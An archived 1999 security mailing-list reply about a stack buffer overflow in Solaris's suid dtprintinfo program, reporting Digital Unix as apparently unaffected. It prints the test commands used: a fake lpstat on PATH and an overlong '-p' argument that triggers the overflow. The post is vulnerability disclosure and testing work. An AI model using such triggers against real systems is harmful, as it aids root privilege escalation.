Re: Solaris2.6,2.7 dtprintinfo exploits

From: Lamont Granquist (lamontgat_private)
Date: Mon May 10 1999 - 13:13:29 PDT

Next message: Russ: "Re: Bookmarks security vulnerabilities in both Internet Explorer"

Previous message: Dmitri Alperovitch: "ICQ Password Revealer"
Maybe in reply to: UNYUN@ShadowPenguin: "Solaris2.6,2.7 dtprintinfo exploits"
Next in thread: Darren J Moffat - Enterprise Services OS Product Support Group: "Re: Solaris2.6,2.7 dtprintinfo exploits"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Digital Unix 4.0 through 4.0D w/BL11 (aka patch kit 3) does not appear to
be vulnerable to this problem.  Tested with:

% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% /usr/dt/bin/dtprintinfo -p `perl -e '{ print "A" x 10000 }'`

On Mon, 10 May 1999, UNYUN@ShadowPenguin wrote:
> "dtprintinfo" is suid program, the stack buffer can be overflowed by '-p'
> option. I made an exploit program that can get root for Intel edition of
> Solaris2.6 and Solaris 2.7.



--
Lamont Granquist                       lamontgat_private
Dept. of Molecular Biotechnology       (206)616-5735  fax: (206)685-7344
Box 352145 / University of Washington / Seattle, WA 98195
PGP pubkey: finger lamontgat_private | pgp -fka

Next message: Russ: "Re: Bookmarks security vulnerabilities in both Internet Explorer"
Previous message: Dmitri Alperovitch: "ICQ Password Revealer"
Maybe in reply to: UNYUN@ShadowPenguin: "Solaris2.6,2.7 dtprintinfo exploits"
Next in thread: Darren J Moffat - Enterprise Services OS Product Support Group: "Re: Solaris2.6,2.7 dtprintinfo exploits"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:45:32 PDT